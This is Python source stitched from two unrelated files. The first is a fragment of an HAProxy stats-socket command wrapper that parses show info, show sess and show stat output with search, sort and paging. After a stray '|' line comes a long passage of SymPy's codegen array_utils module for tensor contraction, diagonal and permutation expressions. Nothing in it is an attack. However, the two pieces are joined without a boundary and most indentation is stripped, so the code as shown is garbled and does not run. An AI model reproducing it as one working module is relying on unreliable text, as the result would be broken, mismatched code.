helpTxt = "List all Frontends."
class showBackends(showFBEnds):
"""Show backends command."""
switch = "backend"
helpTxt = "List all Backends."
class showInfo(Cmd):
"""Show info HAProxy command"""
cmdTxt = "show info\r\n"
helpTxt = "Show info on HAProxy instance."
def getResultObj(self, res):
resDict = {}
        for line in res.split('\n'):
            # skip blank lines; split only on the first ':' so values that
            # contain a colon are preserved
            if ':' not in line:
                continue
            k, v = line.split(':', 1)
            resDict[k] = v
return resDict
class showSessions(Cmd):
"""Show sess HAProxy command"""
cmdTxt = "show sess\r\n"
helpTxt = "Show HAProxy sessions."
def getResultObj(self, res):
return res.split('\n')
class baseStat(Cmd):
"""Base class for stats commands."""
def getDict(self, res):
        # clean response: strip the leading '# ' from the header line and drop
        # the trailing comma on each data line
        res = re.sub(r'^# ', '', res, flags=re.MULTILINE)
        res = re.sub(r',\n', '\n', res)
        res = re.sub(r',\n\n', '\n', res)
csv_string = StringIO(res)
return csv.DictReader(csv_string, delimiter=',')
def getBootstrapOutput(self, **kwargs):
rows = kwargs['rows']
# search
if kwargs['search']:
filtered_rows = []
for row in rows:
def inner(row):
for k, v in row.items():
if kwargs['search'] in v:
return row
return None
match = inner(row)
if match:
filtered_rows.append(match)
rows = filtered_rows
# sort
rows.sort(key=lambda k: k[kwargs['sort_col']], reverse=True if kwargs['sort_dir'] == 'desc' else False)
# pager
total = len(rows)
pages = [rows[i:i + kwargs['page_rows']] for i in range(0, total, kwargs['page_rows'])]
if pages and (kwargs['page'] > len(pages) or kwargs['page'] < 1):
raise KeyError(f"Current page {kwargs['page']} does not exist. Available pages: {len(pages)}")
page = pages[kwargs['page'] - 1] if pages else []
return json.dumps({
"rows": page,
"total": total,
"rowCount": kwargs['page_rows'],
"current": kwargs['page']
})
class showServers(baseStat):
"""Show all servers. If backend is given, show only servers for this backend. """
cmdTxt = "show stat\r\n"
helpTxt = "Lists all servers. Filter for servers in backend, if set."
def getResult(self, res):
if self.args['output'] == 'json':
return json.dumps(self.getResultObj(res))
if self.args['output'] == 'bootstrap':
rows = self.getResultObj(res)
args = {
"rows": rows,
"page": int(self.args['page']) if self.args['page'] != None else 1,
"page_rows": int(self.args['page_rows']) if self.args['page_rows'] != None else len(rows),
"search": self.args['search'],
"sort_col": self.args['sort_col'] if self.args['sort_col'] else 'id',
"sort_dir": self.args['sort_dir'],
}
return self.getBootstrapOutput(**args)
return self.getResultObj(res)
def getResultObj(self, res):
servers = []
reader = self.getDict(res)
for row in reader:
# show only server
if row['svname'] in ['BACKEND', 'FRONTEND']:
continue
# filter server for given backend
if self.args['backend'] and row['pxname'] != self.args['backend']:
continue
# add id
row['id'] = f"{row['pxname']}/{row['svname']}"
row.move_to_end('id', last=False)
servers.append(dict(row))
return servers
|
import bisect
import itertools
from functools import reduce
from collections import defaultdict
from sympy import Indexed, IndexedBase, Tuple, Sum, Add, S, Integer, diagonalize_vector, DiagMatrix
from sympy.combinatorics import Permutation
from sympy.core.basic import Basic
from sympy.core.compatibility import accumulate, default_sort_key
from sympy.core.mul import Mul
from sympy.core.sympify import _sympify
from sympy.functions.special.tensor_functions import KroneckerDelta
from sympy.matrices.expressions import (MatAdd, MatMul, Trace, Transpose,
MatrixSymbol)
from sympy.matrices.expressions.matexpr import MatrixExpr, MatrixElement
from sympy.tensor.array import NDimArray
class _CodegenArrayAbstract(Basic):
@property
def subranks(self):
"""
Returns the ranks of the objects in the uppermost tensor product inside
the current object. In case no tensor products are contained, return
the atomic ranks.
Examples
========
>>> from sympy.codegen.array_utils import CodegenArrayTensorProduct, CodegenArrayContraction
>>> from sympy import MatrixSymbol
>>> M = MatrixSymbol("M", 3, 3)
>>> N = MatrixSymbol("N", 3, 3)
>>> P = MatrixSymbol("P", 3, 3)
Important: do not confuse the rank of the matrix with the rank of an array.
>>> tp = CodegenArrayTensorProduct(M, N, P)
>>> tp.subranks
[2, 2, 2]
>>> co = CodegenArrayContraction(tp, (1, 2), (3, 4))
>>> co.subranks
[2, 2, 2]
"""
return self._subranks[:]
def subrank(self):
"""
The sum of ``subranks``.
"""
return sum(self.subranks)
@property
def shape(self):
return self._shape
class CodegenArrayContraction(_CodegenArrayAbstract):
r"""
This class is meant to represent contractions of arrays in a form easily
processable by the code printers.
"""
def __new__(cls, expr, *contraction_indices, **kwargs):
contraction_indices = _sort_contraction_indices(contraction_indices)
expr = _sympify(expr)
if len(contraction_indices) == 0:
return expr
if isinstance(expr, CodegenArrayContraction):
return cls._flatten(expr, *contraction_indices)
obj = Basic.__new__(cls, expr, *contraction_indices)
obj._subranks = _get_subranks(expr)
obj._mapping = _get_mapping_from_subranks(obj._subranks)
free_indices_to_position = {i: i for i in range(sum(obj._subranks)) if all([i not in cind for cind in contraction_indices])}
obj._free_indices_to_position = free_indices_to_position
shape = expr.shape
cls._validate(expr, *contraction_indices)
if shape:
shape = tuple(shp for i, shp in enumerate(shape) if not any(i in j for j in contraction_indices))
obj._shape = shape
return obj
def __mul__(self, other):
if other == 1:
return self
else:
raise NotImplementedError("Product of N-dim arrays is not uniquely defined. Use another method.")
def __rmul__(self, other):
if other == 1:
return self
else:
raise NotImplementedError("Product of N-dim arrays is not uniquely defined. Use another method.")
@staticmethod
def _validate(expr, *contraction_indices):
shape = expr.shape
if shape is None:
return
# Check that no contraction happens when the shape is mismatched:
for i in contraction_indices:
if len(set(shape[j] for j in i if shape[j] != -1)) != 1:
raise ValueError("contracting indices of different dimensions")
@classmethod
def _push_indices_down(cls, contraction_indices, indices):
flattened_contraction_indices = [j for i in contraction_indices for j in i]
flattened_contraction_indices.sort()
transform = _build_push_indices_down_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
@classmethod
def _push_indices_up(cls, contraction_indices, indices):
flattened_contraction_indices = [j for i in contraction_indices for j in i]
flattened_contraction_indices.sort()
transform = _build_push_indices_up_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
def split_multiple_contractions(self):
"""
Recognize multiple contractions and attempt to rewrite them as paired contractions.
"""
from sympy import ask, Q
contraction_indices = self.contraction_indices
if isinstance(self.expr, CodegenArrayTensorProduct):
args = list(self.expr.args)
else:
args = [self.expr]
# TODO: unify API, best location in CodegenArrayTensorProduct
subranks = [get_rank(i) for i in args]
# TODO: unify API
mapping = _get_mapping_from_subranks(subranks)
reverse_mapping = {v:k for k, v in mapping.items()}
new_contraction_indices = []
for indl, links in enumerate(contraction_indices):
if len(links) <= 2:
new_contraction_indices.append(links)
continue
# Check multiple contractions:
#
# Examples:
#
# * `A_ij b_j0 C_jk` ===> `A*DiagMatrix(b)*C`
#
# Care for:
# - matrix being diagonalized (i.e. `A_ii`)
# - vectors being diagonalized (i.e. `a_i0`)
# Also consider the case of diagonal matrices being contracted:
current_dimension = self.expr.shape[links[0]]
tuple_links = [mapping[i] for i in links]
arg_indices, arg_positions = zip(*tuple_links)
args_updates = {}
if len(arg_indices) != len(set(arg_indices)):
# Maybe trace should be supported?
raise NotImplementedError
not_vectors = []
vectors = []
for arg_ind, arg_pos in tuple_links:
mat = args[arg_ind]
other_arg_pos = 1-arg_pos
other_arg_abs = reverse_mapping[arg_ind, other_arg_pos]
if (((1 not in mat.shape) and (not ask(Q.diagonal(mat)))) or
((current_dimension == 1) is True and mat.shape != (1, 1)) or
any([other_arg_abs in l for li, l in enumerate(contraction_indices) if li != indl])
):
not_vectors.append((arg_ind, arg_pos))
continue
args_updates[arg_ind] = diagonalize_vector(mat)
vectors.append((arg_ind, arg_pos))
vectors.append((arg_ind, 1-arg_pos))
if len(not_vectors) > 2:
new_contraction_indices.append(links)
continue
if len(not_vectors) == 0:
new_sequence = vectors[:1] + vectors[2:]
elif len(not_vectors) == 1:
new_sequence = not_vectors[:1] + vectors[:-1]
else:
new_sequence = not_vectors[:1] + vectors + not_vectors[1:]
for i in range(0, len(new_sequence) - 1, 2):
arg1, pos1 = new_sequence[i]
arg2, pos2 = new_sequence[i+1]
if arg1 == arg2:
raise NotImplementedError
continue
abspos1 = reverse_mapping[arg1, pos1]
abspos2 = reverse_mapping[arg2, pos2]
new_contraction_indices.append((abspos1, abspos2))
for ind, newarg in args_updates.items():
args[ind] = newarg
return CodegenArrayContraction(
CodegenArrayTensorProduct(*args),
*new_contraction_indices
)
def flatten_contraction_of_diagonal(self):
if not isinstance(self.expr, CodegenArrayDiagonal):
return self
contraction_down = self.expr._push_indices_down(self.expr.diagonal_indices, self.contraction_indices)
new_contraction_indices = []
diagonal_indices = self.expr.diagonal_indices[:]
for i in contraction_down:
contraction_group = list(i)
for j in i:
diagonal_with = [k for k in diagonal_indices if j in k]
contraction_group.extend([l for k in diagonal_with for l in k])
diagonal_indices = [k for k in diagonal_indices if k not in diagonal_with]
new_contraction_indices.append(sorted(set(contraction_group)))
new_contraction_indices = CodegenArrayDiagonal._push_indices_up(diagonal_indices, new_contraction_indices)
return CodegenArrayContraction(
CodegenArrayDiagonal(
self.expr.expr,
*diagonal_indices
),
*new_contraction_indices
)
@staticmethod
def _get_free_indices_to_position_map(free_indices, contraction_indices):
free_indices_to_position = {}
flattened_contraction_indices = [j for i in contraction_indices for j in i]
counter = 0
for ind in free_indices:
while counter in flattened_contraction_indices:
counter += 1
free_indices_to_position[ind] = counter
counter += 1
return free_indices_to_position
@staticmethod
def _get_index_shifts(expr):
"""
Get the mapping of indices at the positions before the contraction
occurs.
Examples
========
>>> from sympy.codegen.array_utils import CodegenArrayContraction, CodegenArrayTensorProduct
>>> from sympy import MatrixSymbol
>>> M = MatrixSymbol("M", 3, 3)
>>> N = MatrixSymbol("N", 3, 3)
>>> cg = CodegenArrayContraction(CodegenArrayTensorProduct(M, N), [1, 2])
>>> cg._get_index_shifts(cg)
[0, 2]
Indeed, ``cg`` after the contraction has two dimensions, 0 and 1. They
need to be shifted by 0 and 2 to get the corresponding positions before
the contraction (that is, 0 and 3).
"""
inner_contraction_indices = expr.contraction_indices
all_inner = [j for i in inner_contraction_indices for j in i]
all_inner.sort()
# TODO: add API for total rank and cumulative rank:
total_rank = get_rank(expr)
inner_rank = len(all_inner)
outer_rank = total_rank - inner_rank
shifts = [0 for i in range(outer_rank)]
counter = 0
pointer = 0
for i in range(outer_rank):
while pointer < inner_rank and counter >= all_inner[pointer]:
counter += 1
pointer += 1
shifts[i] += pointer
counter += 1
return shifts
@staticmethod
def _convert_outer_indices_to_inner_indices(expr, *outer_contraction_indices):
shifts = CodegenArrayContraction._get_index_shifts(expr)
outer_contraction_indices = tuple(tuple(shifts[j] + j for j in i) for i in outer_contraction_indices)
return outer_contraction_indices
@staticmethod
def _flatten(expr, *outer_contraction_indices):
inner_contraction_indices = expr.contraction_indices
outer_contraction_indices = CodegenArrayContraction._convert_outer_indices_to_inner_indices(expr, *outer_contraction_indices)
contraction_indices = inner_contraction_indices + outer_contraction_indices
return CodegenArrayContraction(expr.expr, *contraction_indices)
def _get_contraction_tuples(self):
r"""
Return tuples containing, for each contracted index, the index of the
argument and the position of the contracted index within that argument.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction, CodegenArrayTensorProduct
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> cg = CodegenArrayContraction(CodegenArrayTensorProduct(A, B), (1, 2))
>>> cg._get_contraction_tuples()
[[(0, 1), (1, 0)]]
Here the contraction pair `(1, 2)`, meaning that the 2nd and 3rd indices
of the tensor product `A\otimes B` are contracted, has been transformed
into `(0, 1)` and `(1, 0)`, identifying the same indices in a different
notation. `(0, 1)` is the second index (1) of the first argument (i.e.
0 or `A`). `(1, 0)` is the first index (i.e. 0) of the second
argument (i.e. 1 or `B`).
"""
mapping = self._mapping
return [[mapping[j] for j in i] for i in self.contraction_indices]
@staticmethod
def _contraction_tuples_to_contraction_indices(expr, contraction_tuples):
# TODO: check that `expr` has `.subranks`:
ranks = expr.subranks
cumulative_ranks = [0] + list(accumulate(ranks))
return [tuple(cumulative_ranks[j]+k for j, k in i) for i in contraction_tuples]
@property
def free_indices(self):
return self._free_indices[:]
@property
def free_indices_to_position(self):
return dict(self._free_indices_to_position)
@property
def expr(self):
return self.args[0]
@property
def contraction_indices(self):
return self.args[1:]
def _contraction_indices_to_components(self):
expr = self.expr
if not isinstance(expr, CodegenArrayTensorProduct):
raise NotImplementedError("only for contractions of tensor products")
ranks = expr.subranks
mapping = {}
counter = 0
for i, rank in enumerate(ranks):
for j in range(rank):
mapping[counter] = (i, j)
counter += 1
return mapping
def sort_args_by_name(self):
"""
Sort arguments in the tensor product so that their order is lexicographical.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> C = MatrixSymbol("C", N, N)
>>> D = MatrixSymbol("D", N, N)
>>> cg = CodegenArrayContraction.from_MatMul(C*D*A*B)
>>> cg
CodegenArrayContraction(CodegenArrayTensorProduct(C, D, A, B), (1, 2), (3, 4), (5, 6))
>>> cg.sort_args_by_name()
CodegenArrayContraction(CodegenArrayTensorProduct(A, B, C, D), (0, 7), (1, 2), (5, 6))
"""
expr = self.expr
if not isinstance(expr, CodegenArrayTensorProduct):
return self
args = expr.args
sorted_data = sorted(enumerate(args), key=lambda x: default_sort_key(x[1]))
pos_sorted, args_sorted = zip(*sorted_data)
reordering_map = {i: pos_sorted.index(i) for i, arg in enumerate(args)}
contraction_tuples = self._get_contraction_tuples()
contraction_tuples = [[(reordering_map[j], k) for j, k in i] for i in contraction_tuples]
c_tp = CodegenArrayTensorProduct(*args_sorted)
new_contr_indices = self._contraction_tuples_to_contraction_indices(
c_tp,
contraction_tuples
)
return CodegenArrayContraction(c_tp, *new_contr_indices)
def _get_contraction_links(self):
r"""
Returns a dictionary of links between arguments in the tensor product
being contracted.
See the example for an explanation of the values.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> C = MatrixSymbol("C", N, N)
>>> D = MatrixSymbol("D", N, N)
Matrix multiplications are pairwise contractions between neighboring
matrices:
`A_{ij} B_{jk} C_{kl} D_{lm}`
>>> cg = CodegenArrayContraction.from_MatMul(A*B*C*D)
>>> cg
CodegenArrayContraction(CodegenArrayTensorProduct(A, B, C, D), (1, 2), (3, 4), (5, 6))
>>> cg._get_contraction_links()
{0: {1: (1, 0)}, 1: {0: (0, 1), 1: (2, 0)}, 2: {0: (1, 1), 1: (3, 0)}, 3: {0: (2, 1)}}
This dictionary is interpreted as follows: the argument in position 0 (i.e.
matrix `A`) has its second index (i.e. 1) contracted to `(1, 0)`, that is,
to the first index slot of the argument in position 1 (matrix `B`); this is
the contraction provided by the index `j` of `A`.
The argument in position 1 (that is, matrix `B`) has two contractions,
provided by the indices `j` and `k`, on its first and second index slots
(0 and 1 in the sub-dict); the corresponding links are `(0, 1)` and
`(2, 0)`, respectively. `(0, 1)` is index slot 1 (the 2nd) of the argument
in position 0 (that is, `A_{\cdot j}`), and so on.
"""
args, dlinks = _get_contraction_links([self], self.subranks, *self.contraction_indices)
return dlinks
@staticmethod
def from_MatMul(expr):
args_nonmat = []
args = []
contractions = []
for arg in expr.args:
if isinstance(arg, MatrixExpr):
args.append(arg)
else:
args_nonmat.append(arg)
contractions = [(2*i+1, 2*i+2) for i in range(len(args)-1)]
return Mul.fromiter(args_nonmat)*CodegenArrayContraction(
CodegenArrayTensorProduct(*args),
*contractions
)
def get_shape(expr):
if hasattr(expr, "shape"):
return expr.shape
return ()
class CodegenArrayTensorProduct(_CodegenArrayAbstract):
r"""
Class to represent the tensor product of array-like objects.
"""
def __new__(cls, *args):
args = [_sympify(arg) for arg in args]
args = cls._flatten(args)
ranks = [get_rank(arg) for arg in args]
if len(args) == 1:
return args[0]
# If there are contraction objects inside, transform the whole
# expression into `CodegenArrayContraction`:
contractions = {i: arg for i, arg in enumerate(args) if isinstance(arg, CodegenArrayContraction)}
if contractions:
cumulative_ranks = list(accumulate([0] + ranks))[:-1]
tp = cls(*[arg.expr if isinstance(arg, CodegenArrayContraction) else arg for arg in args])
contraction_indices = [tuple(cumulative_ranks[i] + k for k in j) for i, arg in contractions.items() for j in arg.contraction_indices]
return CodegenArrayContraction(tp, *contraction_indices)
#newargs = [i for i in args if hasattr(i, "shape")]
#coeff = reduce(lambda x, y: x*y, [i for i in args if not hasattr(i, "shape")], S.One)
#newargs[0] *= coeff
obj = Basic.__new__(cls, *args)
obj._subranks = ranks
shapes = [get_shape(i) for i in args]
if any(i is None for i in shapes):
obj._shape = None
else:
obj._shape = tuple(j for i in shapes for j in i)
return obj
@classmethod
def _flatten(cls, args):
args = [i for arg in args for i in (arg.args if isinstance(arg, cls) else [arg])]
return args
class CodegenArrayElementwiseAdd(_CodegenArrayAbstract):
r"""
Class for elementwise array additions.
"""
def __new__(cls, *args):
args = [_sympify(arg) for arg in args]
obj = Basic.__new__(cls, *args)
ranks = [get_rank(arg) for arg in args]
ranks = list(set(ranks))
if len(ranks) != 1:
raise ValueError("summing arrays of different ranks")
obj._subranks = ranks
shapes = [arg.shape for arg in args]
if len(set([i for i in shapes if i is not None])) > 1:
raise ValueError("mismatching shapes in addition")
if any(i is None for i in shapes):
obj._shape = None
else:
obj._shape = shapes[0]
return obj
class CodegenArrayPermuteDims(_CodegenArrayAbstract):
r"""
Class to represent permutation of axes of arrays.
Examples
========
>>> from sympy.codegen.array_utils import CodegenArrayPermuteDims
>>> from sympy import MatrixSymbol
>>> M = MatrixSymbol("M", 3, 3)
>>> cg = CodegenArrayPermuteDims(M, [1, 0])
The object ``cg`` represents the transposition of ``M``, as the permutation
``[1, 0]`` will act on its indices by switching them:
`M_{ij} \Rightarrow M_{ji}`
This is evident when transforming back to matrix form:
>>> from sympy.codegen.array_utils import recognize_matrix_expression
>>> recognize_matrix_expression(cg)
M.T
>>> N = MatrixSymbol("N", 3, 2)
>>> cg = CodegenArrayPermuteDims(N, [1, 0])
>>> cg.shape
(2, 3)
"""
def __new__(cls, expr, permutation):
from sympy.combinatorics import Permutation
expr = _sympify(expr)
permutation = Permutation(permutation)
plist = permutation.array_form
if plist == sorted(plist):
return expr
obj = Basic.__new__(cls, expr, permutation)
obj._subranks = [get_rank(expr)]
shape = expr.shape
if shape is None:
obj._shape = None
else:
obj._shape = tuple(shape[permutation(i)] for i in range(len(shape)))
return obj
@property
def expr(self):
return self.args[0]
@property
def permutation(self):
return self.args[1]
def nest_permutation(self):
r"""
Nest the permutation down the expression tree.
Examples
========
>>> from sympy.codegen.array_utils import (CodegenArrayPermuteDims, CodegenArrayTensorProduct, nest_permutation)
>>> from sympy import MatrixSymbol
>>> from sympy.combinatorics import Permutation
>>> M = MatrixSymbol("M", 3, 3)
>>> N = MatrixSymbol("N", 3, 3)
>>> cg = CodegenArrayPermuteDims(CodegenArrayTensorProduct(M, N), [1, 0, 3, 2])
>>> cg
CodegenArrayPermuteDims(CodegenArrayTensorProduct(M, N), (0 1)(2 3))
>>> nest_permutation(cg)
CodegenArrayTensorProduct(CodegenArrayPermuteDims(M, (0 1)), CodegenArrayPermuteDims(N, (0 1)))
In ``cg`` both ``M`` and ``N`` are transposed. The cyclic
representation of the permutation after the tensor product is
`(0 1)(2 3)`. After nesting it down the expression tree, the usual
transposition permutation `(0 1)` appears.
"""
expr = self.expr
if isinstance(expr, CodegenArrayTensorProduct):
# Check if the permutation keeps the subranks separated:
subranks = expr.subranks
subrank = expr.subrank()
l = list(range(subrank))
p = [self.permutation(i) for i in l]
dargs = {}
counter = 0
for i, arg in zip(subranks, expr.args):
p0 = p[counter:counter+i]
counter += i
s0 = sorted(p0)
if not all([s0[j+1]-s0[j] == 1 for j in range(len(s0)-1)]):
# Cross-argument permutations, impossible to nest the object:
return self
subpermutation = [p0.index(j) for j in s0]
dargs[s0[0]] = CodegenArrayPermuteDims(arg, subpermutation)
# Read the arguments, sorting them according to the keys of the dict:
args = [dargs[i] for i in sorted(dargs)]
return CodegenArrayTensorProduct(*args)
elif isinstance(expr, CodegenArrayContraction):
# Invert tree hierarchy: put the contraction above.
cycles = self.permutation.cyclic_form
newcycles = CodegenArrayContraction._convert_outer_indices_to_inner_indices(expr, *cycles)
newpermutation = Permutation(newcycles)
new_contr_indices = [tuple(newpermutation(j) for j in i) for i in expr.contraction_indices]
return CodegenArrayContraction(CodegenArrayPermuteDims(expr.expr, newpermutation), *new_contr_indices)
elif isinstance(expr, CodegenArrayElementwiseAdd):
return CodegenArrayElementwiseAdd(*[CodegenArrayPermuteDims(arg, self.permutation) for arg in expr.args])
return self
def nest_permutation(expr):
if isinstance(expr, CodegenArrayPermuteDims):
return expr.nest_permutation()
else:
return expr
class CodegenArrayDiagonal(_CodegenArrayAbstract):
r"""
Class to represent the diagonal operator.
In a 2-dimensional array it returns the diagonal; this corresponds to the
operation:
`A_{ij} \rightarrow A_{ii}`
The diagonal over axes 1 and 2 (the second and third) of the tensor product
of two 2-dimensional arrays `A \otimes B` is
`\Big[ A_{ab} B_{cd} \Big]_{abcd} \rightarrow \Big[ A_{ai} B_{id} \Big]_{adi}`
In this last example the array expression has been reduced from
4-dimensional to 3-dimensional. Notice that no contraction has occurred,
rather there is a new index `i` for the diagonal; a contraction would have
reduced the array to 2 dimensions.
Notice that the diagonalized out dimensions are added as new dimensions at
the end of the indices.
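A minimal illustrative example (a sketch added for clarity; ``A`` and ``B``
are defined inline, and the diagonalized dimension is appended at the end):
>>> from sympy.codegen.array_utils import CodegenArrayDiagonal, CodegenArrayTensorProduct
>>> from sympy import MatrixSymbol
>>> A = MatrixSymbol("A", 3, 3)
>>> B = MatrixSymbol("B", 3, 3)
>>> cg = CodegenArrayDiagonal(CodegenArrayTensorProduct(A, B), (1, 2))
>>> cg.shape
(3, 3, 3)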
"""
def __new__(cls, expr, *diagonal_indices):
expr = _sympify(expr)
diagonal_indices = [Tuple(*sorted(i)) for i in diagonal_indices]
if isinstance(expr, CodegenArrayDiagonal):
return cls._flatten(expr, *diagonal_indices)
shape = expr.shape
if shape is not None:
diagonal_indices = [i for i in diagonal_indices if len(i) > 1]
cls._validate(expr, *diagonal_indices)
#diagonal_indices = cls._remove_trivial_dimensions(shape, *diagonal_indices)
# Get new shape:
shp1 = tuple(shp for i,shp in enumerate(shape) if not any(i in j for j in diagonal_indices))
shp2 = tuple(shape[i[0]] for i in diagonal_indices)
shape = shp1 + shp2
if len(diagonal_indices) == 0:
return expr
obj = Basic.__new__(cls, expr, *diagonal_indices)
obj._subranks = _get_subranks(expr)
obj._shape = shape
return obj
@staticmethod
def _validate(expr, *diagonal_indices):
# Check that no diagonalization happens on indices with mismatched
# dimensions:
shape = expr.shape
for i in diagonal_indices:
if len(set(shape[j] for j in i)) != 1:
raise ValueError("diagonalizing indices of different dimensions")
@staticmethod
def _remove_trivial_dimensions(shape, *diagonal_indices):
return [tuple(j for j in i) for i in diagonal_indices if shape[i[0]] != 1]
@property
def expr(self):
return self.args[0]
@property
def diagonal_indices(self):
return self.args[1:]
@staticmethod
def _flatten(expr, *outer_diagonal_indices):
inner_diagonal_indices = expr.diagonal_indices
all_inner = [j for i in inner_diagonal_indices for j in i]
all_inner.sort()
# TODO: add API for total rank and cumulative rank:
total_rank = get_rank(expr)
inner_rank = len(all_inner)
outer_rank = total_rank - inner_rank
shifts = [0 for i in range(outer_rank)]
counter = 0
pointer = 0
for i in range(outer_rank):
while pointer < inner_rank and counter >= all_inner[pointer]:
counter += 1
pointer += 1
shifts[i] += pointer
counter += 1
outer_diagonal_indices = tuple(tuple(shifts[j] + j for j in i) for i in outer_diagonal_indices)
diagonal_indices = inner_diagonal_indices + outer_diagonal_indices
return CodegenArrayDiagonal(expr.expr, *diagonal_indices)
@classmethod
def _push_indices_down(cls, diagonal_indices, indices):
flattened_contraction_indices = [j for i in diagonal_indices for j in i[1:]]
flattened_contraction_indices.sort()
transform = _build_push_indices_down_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
@classmethod
def _push_indices_up(cls, diagonal_indices, indices):
flattened_contraction_indices = [j for i in diagonal_indices for j in i[1:]]
flattened_contraction_indices.sort()
transform = _build_push_indices_up_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
def transform_to_product(self):
from sympy import ask, Q
diagonal_indices = self.diagonal_indices
if isinstance(self.expr, CodegenArrayContraction):
# invert Diagonal and Contraction:
diagonal_down = CodegenArrayContraction._push_indices_down(
self.expr.contraction_indices,
diagonal_indices
)
newexpr = CodegenArrayDiagonal(
self.expr.expr,
*diagonal_down
).transform_to_product()
contraction_up = newexpr._push_indices_up(
diagonal_down,
self.expr.contraction_indices
)
return CodegenArrayContraction(
newexpr,
*contraction_up
)
if not isinstance(self.expr, CodegenArrayTensorProduct):
return self
args = list(self.expr.args)
# TODO: unify API
subranks = [get_rank(i) for i in args]
# TODO: unify API
mapping = _get_mapping_from_subranks(subranks)
new_contraction_indices = []
drop_diagonal_indices = []
for indl, links in enumerate(diagonal_indices):
if len(links) > 2:
continue
# Also consider the case of diagonal matrices being contracted:
current_dimension = self.expr.shape[links[0]]
if current_dimension == 1:
drop_diagonal_indices.append(indl)
continue
tuple_links = [mapping[i] for i in links]
arg_indices, arg_positions = zip(*tuple_links)
if len(arg_indices) != len(set(arg_indices)):
# Maybe trace should be supported?
raise NotImplementedError
args_updates = {}
count_nondiagonal = 0
last = None
expression_is_square = False
# Check that all args are vectors:
for arg_ind, arg_pos in tuple_links:
mat = args[arg_ind]
if 1 in mat.shape and mat.shape != (1, 1):
args_updates[arg_ind] = DiagMatrix(mat)
last = arg_ind
else:
expression_is_square = True
if not ask(Q.diagonal(mat)):
count_nondiagonal += 1
if count_nondiagonal > 1:
break
if count_nondiagonal > 1:
continue
# TODO: if count_nondiagonal == 0 then the sub-expression can be recognized as HadamardProduct.
for arg_ind, newmat in args_updates.items():
if not expression_is_square and arg_ind == last:
continue
#pass
args[arg_ind] = newmat
drop_diagonal_indices.append(indl)
new_contraction_indices.append(links)
new_diagonal_indices = CodegenArrayContraction._push_indices_up(
new_contraction_indices,
[e for i, e in enumerate(diagonal_indices) if i not in drop_diagonal_indices]
)
return CodegenArrayDiagonal(
CodegenArrayContraction(
CodegenArrayTensorProduct(*args),
*new_contraction_indices
),
*new_diagonal_indices
)
def get_rank(expr):
if isinstance(expr, (MatrixExpr, MatrixElement)):
return 2
if isinstance(expr, _CodegenArrayAbstract):
return expr.subrank()
if isinstance(expr, NDimArray):
return expr.rank()
if isinstance(expr, Indexed):
return expr.rank
if isinstance(expr, IndexedBase):
shape = expr.shape
if shape is None:
return -1
else:
return len(shape)
if isinstance(expr, _RecognizeMatOp):
return expr.rank()
if isinstance(expr, _RecognizeMatMulLines):
return expr.rank()
return 0
def _get_subranks(expr):
if isinstance(expr, _CodegenArrayAbstract):
return expr.subranks
else:
return [get_rank(expr)]
def _get_mapping_from_subranks(subranks):
mapping = {}
counter = 0
for i, rank in enumerate(subranks):
for j in range(rank):
mapping[counter] = (i, j)
counter += 1
return mapping
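# Illustrative note (added for clarity): for two matrices, i.e. subranks
# [2, 2], the mapping is {0: (0, 0), 1: (0, 1), 2: (1, 0), 3: (1, 1)},
# sending each absolute index of the tensor product to an
# (argument position, index-within-argument) pair.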
def _get_contraction_links(args, subranks, *contraction_indices):
mapping = _get_mapping_from_subranks(subranks)
contraction_tuples = [[mapping[j] for j in i] for i in contraction_indices]
dlinks = defaultdict(dict)
for links in contraction_tuples:
if len(links) == 2:
(arg1, pos1), (arg2, pos2) = links
dlinks[arg1][pos1] = (arg2, pos2)
dlinks[arg2][pos2] = (arg1, pos1)
continue
return args, dict(dlinks)
def _sort_contraction_indices(pairing_indices):
pairing_indices = [Tuple(*sorted(i)) for i in pairing_indices]
pairing_indices.sort(key=lambda x: min(x))
return pairing_indices
def _get_diagonal_indices(flattened_indices):
axes_contraction = defaultdict(list)
for i, ind in enumerate(flattened_indices):
if isinstance(ind, (int, Integer)):
# If the index is a number, there can be no diagonal operation:
continue
axes_contraction[ind].append(i)
axes_contraction = {k: v for k, v in axes_contraction.items() if len(v) > 1}
# Put the diagonalized indices at the end:
ret_indices = [i for i in flattened_indices if i not in axes_contraction]
diag_indices = list(axes_contraction)
diag_indices.sort(key=lambda x: flattened_indices.index(x))
diagonal_indices = [tuple(axes_contraction[i]) for i in diag_indices]
ret_indices += diag_indices
ret_indices = tuple(ret_indices)
return diagonal_indices, ret_indices
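# Illustrative note (a hedged sketch with symbolic indices i, j): for
# flattened_indices = [i, j, i] the repeated symbol i marks a diagonal, so
# this returns diagonal_indices = [(0, 2)] and ret_indices = (j, i),
# i.e. the diagonalized index is moved to the end.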
def _get_argindex(subindices, ind):
for i, sind in enumerate(subindices):
if ind == sind:
return i
if isinstance(sind, (set, frozenset)) and ind in sind:
return i
raise IndexError("%s not found in %s" % (ind, subindices))
def _codegen_array_parse(expr):
if isinstance(expr, Sum):
function = expr.function
summation_indices = expr.variables
subexpr, subindices = _codegen_array_parse(function)
# Check dimensional consistency:
shape = subexpr.shape
if shape:
for ind, istart, iend in expr.limits:
i = _get_argindex(subindices, ind)
if istart != 0 or iend+1 != shape[i]:
raise ValueError("summation index and array dimension mismatch: %s" % ind)
contraction_indices = []
subindices = list(subindices)
if isinstance(subexpr, CodegenArrayDiagonal):
diagonal_indices = list(subexpr.diagonal_indices)
dindices = subindices[-len(diagonal_indices):]
